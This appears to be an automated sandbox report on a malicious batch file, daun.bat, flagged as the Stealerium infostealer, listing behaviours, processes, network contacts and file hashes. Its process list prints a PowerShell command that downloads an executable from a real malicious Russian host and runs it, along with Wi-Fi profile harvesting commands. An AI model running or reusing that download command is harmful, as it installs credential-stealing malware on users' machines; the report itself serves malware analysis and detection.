Analysis Overview
SHA256
295303516fe6fed6586432afa4e9c0385c526786ae3c6a3be1cc8a561a2a100c
Threat Level: Known bad
The file daun.bat was found to be: Known bad.
Malicious Activity Summary
Stealerium
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Enumerates physical storage devices
outlook_office_path
Enumerates system info in registry
Checks processor information in registry
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Opens file in notepad (likely ransom note)
outlook_win_path
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Kills process with taskkill
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 18:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 18:48
Reported
2024-06-14 18:50
Platform
win10v2004-20240611-en
Max time kernel
123s
Max time network
122s
Command Line
Signatures
Stealerium
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628645411872252" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\daun.bat"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb93bab58,0x7ffcb93bab68,0x7ffcb93bab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1944 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3152 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3184 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4532,i,2029050989380753659,15333598055019363793,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4012 --field-trial-handle=1808,i,9470089256284989227,9455454605186894825,131072 /prefetch:1
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\daun.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\daun.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2ABC.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 5348
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| GB | 52.123.242.9:443 | tcp | |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | 58.192.8.141.in-addr.arpa | udp |
| GB | 52.123.242.49:443 | tcp | |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a0995400.xsph.ru | udp |
| RU | 141.8.192.58:80 | a0995400.xsph.ru | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
\??\pipe\crashpad_4844_PXKDIICFMCNZJXZJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5f4f1715000b3508f8f59ec6400d8924 |
| SHA1 | a387f0ea95c49ca08855df741d65fc222e4ac109 |
| SHA256 | 1887959d01c615c1601cf044c10906316e0ad9b3eebe37402a0227aee4c1cedc |
| SHA512 | 9e304194fb59012e4b75a6f1691ed63e3405ab0c9b6c86e5008772472bc7a5dd8e130e1e7c59507b9bac8e749c975a9c320c64cf1eb5fa068328fb163e82e643 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | de97c6089ab64dde4df0a50d8bea9f64 |
| SHA1 | f6543bd2fdf2387c8ce34287ba789e62fe8be651 |
| SHA256 | 29433e439c47047d031e08d6f42ed234424ec02a4f022807b3d60bc4b0ff60e8 |
| SHA512 | 4560bee6ed088326adcdd8b14c762a78c0b63073cf75dd1b920f38f31fa9069400174b93c9cb8a3a6fd51dce1dc92dab63c0c7e0021f7055889edcd3c186c576 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 59166226289267150abc40c555789a4a |
| SHA1 | f66b74fc8871a2a452f24890dc431487d5c5d594 |
| SHA256 | 4176f23d3196d084d64e21e4f91b6c26b66d2a11a67f42dc42aa6a89209db723 |
| SHA512 | df2804e863b42b7de292737d9c0b8426ccc729565199fb37e14a49b989d8559eeb65f1a961bf2b8343f7d5e4cce3c8fe4b0068dc457087888a1634eaa91579ef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 85e0001a5e4fb99ced1ab81bf553785f |
| SHA1 | 353978563ab311650d28d893b230322a8e46e606 |
| SHA256 | 0d598098722b79b4c0bf2b19dabe4a2f1c580313a3c28da1232ff26c07063830 |
| SHA512 | 3a560fa1ac2151f3b78d645419c20914712310c7b503cfe7192176a28933a78753b9bbeb9f0ad4e59b4716783158873745f12b3b0fc282f809f68143c20e747e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 236dc3b1698858cd6507628c6d9fa8ed |
| SHA1 | 55144e0ca200f8fb37d0cf1271464170faa1ea84 |
| SHA256 | f26d6af3ade8e972cd12fea698d7c5354bb18f404aea60e98f3b6af5e6371352 |
| SHA512 | 2416490fc1fe86457bd3c1cd0d7bd412782140469d0095dd967e8c21c989ab64f98ae8850212ecd72c292493372ebf674b8017b713f2fa8bb906c9d6dd1c08e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5fdc79310956fcc1c13e6b321a0bc6b6 |
| SHA1 | 5c082d6af7e88ce1838f4a2716589615013cc7f9 |
| SHA256 | c180d82dfdd0495622246afa59b59f37fc6ec03bed30aca691041c9e039e5a35 |
| SHA512 | f69e13f5dd491b6758e9223cbb1a9e7bc7df22f8b10cf5b6c8fcad8f1ba8f9089c679d41c0929310a52342da1f9ec2d004ea131a4914c85ba380556b5715edea |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\7e03d866-3051-49cb-b2ce-f4f206ea41c3.tmp
| MD5 | 049a93f5fd0fc3c1afb243874cd3c10c |
| SHA1 | 5870ae7911fe07dfa3317620766535ec142d0171 |
| SHA256 | f38d4c5532f4400579d79f533bf8dfa2a2325e44bebab30d9dc00344a43b21f5 |
| SHA512 | 5cf69a208238f478984a032b61f615fff4b098f733b870476b23e55db9881f1e6146928a7cbdcf8a0a3639a2dec96efe231314daeeb63d5b44216a1cf21bfc4a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/5944-162-0x00007FFCC11C0000-0x00007FFCC1226000-memory.dmp
C:\Users\Admin\Desktop\daun.bat
| MD5 | cbca251aec580145e3681ebdb9db1fef |
| SHA1 | 35bae4f9ef12f75e06867ba33a4d5cb2604c3d44 |
| SHA256 | 9f355d5b60141f561279e56bc80ba944f74029f837598f4c4a9ec68025452d8b |
| SHA512 | 5491e607da8e8f091f23800e7cf4613e294693176638976d54e037d540aaa190ab5b80fb2c14e7c3532793e5fb701418aea5e1819181b378f9c7989cd670a4ea |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3gcaumdv.fi4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5248-177-0x000002467FEC0000-0x000002467FEE2000-memory.dmp
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
| MD5 | 4fdee2f1b5d9fba50d17fa7acc098681 |
| SHA1 | 6c7008679dc6b90f29d4be48b9908aa8dec5af35 |
| SHA256 | dabc05fbecee7566ddf88519368e6602d1eeab679734a3830f99e083acc775d2 |
| SHA512 | 50972f5afc3f324c85a178029812257765be5ae600127e873b8ef3a934e73e3475204d2cc4cf3554ac3cf3c9debf4d61067d24ef861142194fea1941129c94b8 |
memory/5348-184-0x00000000006F0000-0x0000000000882000-memory.dmp
memory/5348-185-0x00000000051D0000-0x0000000005236000-memory.dmp
memory/5348-188-0x0000000005690000-0x0000000005722000-memory.dmp
memory/5348-189-0x00000000052E0000-0x0000000005306000-memory.dmp
memory/5348-190-0x00000000052B0000-0x00000000052B8000-memory.dmp
memory/5348-191-0x0000000006640000-0x000000000664A000-memory.dmp
memory/5348-193-0x0000000006670000-0x000000000668E000-memory.dmp
memory/5348-192-0x0000000006650000-0x0000000006658000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | 720e18e01a0d8f4f521dc5a0317d8888 |
| SHA1 | f5a94e9e221175fb3242fecb3c0298893f229b1d |
| SHA256 | 8cc20beb1ab13edda2fed019df608bbd5d835a2ef3a76677b00ff093599d9499 |
| SHA512 | 71a3547f0a7a84bab8387acab47e96c2b04f00f10c3bc8f8b23174d9dc60c6e8c241370338f4ad55c8af1dd789b203c81082a521cce5fcef9b2e0565e9da39c8 |
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/5348-250-0x00000000069A0000-0x0000000006A32000-memory.dmp
memory/5348-252-0x00000000074B0000-0x0000000007A54000-memory.dmp
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\System\Apps.txt
| MD5 | c6f6583121e944bb89d4a06d1ae9aa77 |
| SHA1 | 1c81d0a0c953494c7fabbe951b9c57fe35b51fe2 |
| SHA256 | 7fdaf7f5f361d38181555f9c79b23d7813efe03d9c6401291512980e8c441d16 |
| SHA512 | 45a6f99767fa5057b10609f5afd666206a1f2a9f869e6dc89c9c6e267c40adabb3b8297bf8d5cbe2d432f5b6c39eb21331a8bb222c0f2e827c9f274a21348265 |
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\System\Process.txt
| MD5 | bb31f6220f75ad5842d02c45cfd1f883 |
| SHA1 | 814ac010e4917406c115fa06d5e5a3c3a24883e7 |
| SHA256 | 040c2d9c10d74c94327f13c24c022e2667ef4a64e84269799595834a24e228a0 |
| SHA512 | 9a84078dfc3f4efb1adc89b72e9760e99867087653f5727c117651a88ce488671c415e6ac4fc7c083e63ddbf03acbde1e78ec4e3ee9347b3bcb3bb981a053cc6 |
memory/5348-395-0x00000000067E0000-0x000000000685A000-memory.dmp
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\Browsers\Google\History.txt
| MD5 | baf1f11cc346ec6b9e7465ada4ecf4ea |
| SHA1 | 926ac4d4abd04e1efa36b52de0d471687076d60c |
| SHA256 | 5e31a948c8f81ab293526901a6c646db649651139aa5aa8bb46b53e3f5b116cf |
| SHA512 | 94eaab949a1905ec6161cebf330607820182920b9b544eb6dcf82650f2d961f49053addb23fe339366ca6d8025e71c09296edff9781e0b51c1a79122f4351d76 |
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\System\Debug.txt
| MD5 | 563ea3ced2b60be5513d0948c3b6b710 |
| SHA1 | 83b95d152f1f3ce1f989e9d7faec40e9c9f5bc41 |
| SHA256 | f98723ddf0b4555146012592c9c8eae53606ed6ab576ff3d88047c2552e8530a |
| SHA512 | aa885e85a1b951e390286c2b7d5de9d6fcf466ff8ee226b03b6bdfcb9236453ff3309389d8e96f76092c2c9b9f034a5720c530a081b7a5edf814dd24cf09e6b7 |
memory/5348-477-0x0000000006A40000-0x0000000006AF2000-memory.dmp
C:\Users\Admin\AppData\Local\1496695157cf78d4a52269818ef32235\Admin@PXHSTPPU_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
